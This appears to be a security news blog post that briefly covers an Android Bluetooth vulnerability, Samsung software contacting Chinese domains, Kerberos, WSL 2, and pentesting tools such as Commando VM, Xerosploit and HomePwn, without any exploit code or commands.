Android has a CRITICAL bug in it’s Bluetooth implementation

If you are an Android user you should update your phone/tablet RIGHT NOW! Google has patched a very serious bug (CVE-2020-0022) in their Bluetooth service that, get this, can be exploited remotely with no user interaction and has the potential to be turned into a worm! If your device doesn’t receive updates then get a new one or switch to using an iPhone/iPad (which I believe is far more secure). Even the latest version of Android (10) still has the bug, but it’ll only crash the Bluetooth daemon (for now).

Links:

Samsung Android devices are sending data to Chinese domains

First discovered by a Reddit user, he observed his Samsung device making calls out to Chinese owned domains. The software that was responsible for this is installed on nearly all Samsung’s line Android products, including their smart phones and tablets. Further research revealed that Samsung had partnered with Qihoo 360, a Chinese owned firm with a reputation for censoring users at the request of the Chinese government, to develop software that can’t be uninstalled of the device. Samsung released a public statement stating that the only data being sent to China is model, storage, and operating system version [for now].

Links:

Great visual guide to how Kerberos works in Windows Active Directory networks

Today on Twitter I found a really easy to follow walk through about how Kerberos works in Windows Active Directory networks. It walks you through each step of the authentication process, what machines are involved and what is happening underneath the hood. It’s a great read for anyone want to know more about how modern day Windows authentication works.

Links:

Microsoft Windows Subsystem for Linux 2

In May of 2019 Microsoft (MS) released a major update for Windows Subsystem for Linux (WSL). The original WSL used parts of Hyper-V to run a full on Linux distro, such as Ubuntu or Kali. This May MS released WSL 2 which greatly enhanced both the capabilities and speed of this subsystem. They haven’t really publicized it’s release very well which is why I’m making a post to promote it. Next time you play a CTF instead of using a Kali VM try out WSL 2 with Kali installed!

Links:

FireEye’s Commando VM: The first offensive Windows distro

At first I could only laugh at the fact that someone had bothered making a Windows pentesting distribution, but upon closer inspection it is well suited for taking advantage of the Windows Remote Management (WinRM) capabilities that are shipping with all modern day Windows distributions. This means you can remotely control any Windows machine in the domain if you have the right credentials. Since Microsoft introduced Windows Subsystem for Linux v2 (WSL2) you now have the ability to run Kali on a Windows system, but it still has issues interfacing with proprietary Windows protocols like what WinRM uses. It includes core tools such as Covenant, nmap, Wireshark, etc. I will post the GitHub link to the Hacker Tools page.

Links:

New MitM Framework: Xerosploit

This is a script built on top of nmap and Bettercap that allows for new modules to be written in Ruby. It comes with the ability to modify HTML over the wire to inject malicious JavaScript, an iframe, or other forms of client-side web attacks. It also emulates the Metasploit interface to make it easier for pentesters to learn this tool. I have also put this on the Hacker Tools page as well.

Links:

HomePwn – Swiss Army Knife for Pentesting of IoT Devices

I just found a new Internet of Things (IoT) testing framework called HomePwn. It boasts the following features:

    • Bluetooth Low-Energy (BLE)
    • WiFi
    • Near Field Communication (NFC)
    • Simple Service Discovery Protocol (SSDP)
    • Multicast Domain Name System (MDNS)
    • Xiaomi device support
    • SmartTV support
    • Metasploit-like command line interface

Here’s a link to the GitHub repo and I have also put this tool on the Hacker Tools page as well: http://bit.ly/378i0z1